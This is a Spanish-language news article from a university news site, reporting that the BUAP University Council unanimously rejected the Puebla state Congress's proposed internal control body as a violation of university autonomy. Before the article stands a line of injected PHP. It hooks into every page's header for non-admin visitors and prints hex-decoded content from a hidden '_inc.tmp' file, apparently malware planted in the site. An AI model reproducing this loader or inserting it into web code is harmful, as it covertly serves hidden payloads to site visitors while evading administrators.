if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } No crear Órgano de Control Interno pide Consejo Universitario – La Opinión Universitaria La Opinión Universitaria
Menu

No crear Órgano de Control Interno pide Consejo Universitario

 

 

  • Propusieron la realización de marchas para defender la autonomía de la Máxima Casa de Estudios

Por Diego Cuautle

Por unanimidad de votos, el Consejo Universitario de la Benemérita Universidad Autónoma de Puebla (BUAP) hizo un llamado al Congreso Local desistir en su intención de crear un Órgano de Control Interno ya no debe intervenir en las facultades de la propia institución.

Lo anterior durante la reunión que se llevó a cabo en el Edificio Carolino donde todos los consejeros al unísono de “Autonomía, Autonomía”, rechazaron la propuesta hecha en días pasados por el legislativo del Estado.

Durante la presentación del punto, Eduardo Monjaraz Guzmán, director del Instituto de Fisiología, indicó que “estamos sujetos al Sistema Nacional Anticorrupción, pero es absurdo pensar que el Estado puede intervenir en la universidad, suplantándola al atribuirse indebidamente una facultad que es abiertamente contraria a lo expresado por el Constituyente y las interpretaciones del Poder Judicial federal”.

En este sentido, el directivo reiteró que lo que se busca es suplantar los organismos internos, de gestión y transparencia que existen en las universidades, en este caso como el Consejo Universitario de la BUAP.

“No hay disposiciones legales que faciliten al Poder Legislativo a intervenir en el manejo de las finanzas de la institución educativo, más allá de las auditorías que por ley deben practicársele”, agregó.

Indicó que en las veces que se le ha solicitado a la BUAP de manera legar en tiempo y forma en ser sometida a las auditorias lo han hecho en tiempo y forma y que así continuarán haciéndolo.

Cabe señalar que durante el análisis y discusión del punto, los integrantes del Máximo Órgano Universitario no dudaron en ningún momento en realizar marchas para defender la autonomía universitaria si agentes externos continúan atentando como lo han hecho hasta ahora.

Por su parte Francisco Vélez Pliego, director del Instituto de Ciencias Sociales y Humanidades (CSyH) propuso enviar una iniciativa a la Asociación Nacional de Universidades e Instituciones de Educación Superior (ANUIES), para que emita una postura con respecto a las medidas que violan la autonomía de la BUAP y otras universidades a nivel nacional.

 

De pie y con el puño en alto, unidos en una sola voz: ¡autonomía!, ¡autonomía!, ¡autonomía!, los consejeros universitarios aprobaron por unanimidad de votos exhortar al Congreso del Estado a abstenerse “de irrumpir en el ámbito de facultades que corresponden exclusivamente a la comunidad universitaria”, de acuerdo con la fracción VII del artículo 3° constitucional.

 

Durante la cuarta sesión extraordinaria del Máximo Órgano de Gobierno de la Institución, Eduardo Monjaraz Guzmán, representante del Grupo de Enlace y Seguimiento, afirmó que la imposición de un órgano de control interno, como lo propone el gobierno del estado, violaría la autonomía universitaria consagrada en dicho artículo, pues se estaría consignando una excepción a la facultad de autogobierno y autorregulación de las universidades públicas autónomas.

“La autonomía es sinónimo de garantía y de calidad educativa, de la concentración y libertad de ideas, por lo que solo debe estar en manos de maestros y alumnos. Debe ser ajena a toda injerencia que afecte los fines constitucionales, pues solo así podrá exigirse a la Universidad los resultados demandados por la nación. Por lo tanto, no resulta constitucional ni legalmente posible que reciba órdenes o instrucciones de ningún órgano exterior en la toma de sus decisiones”

  • Tweets recientes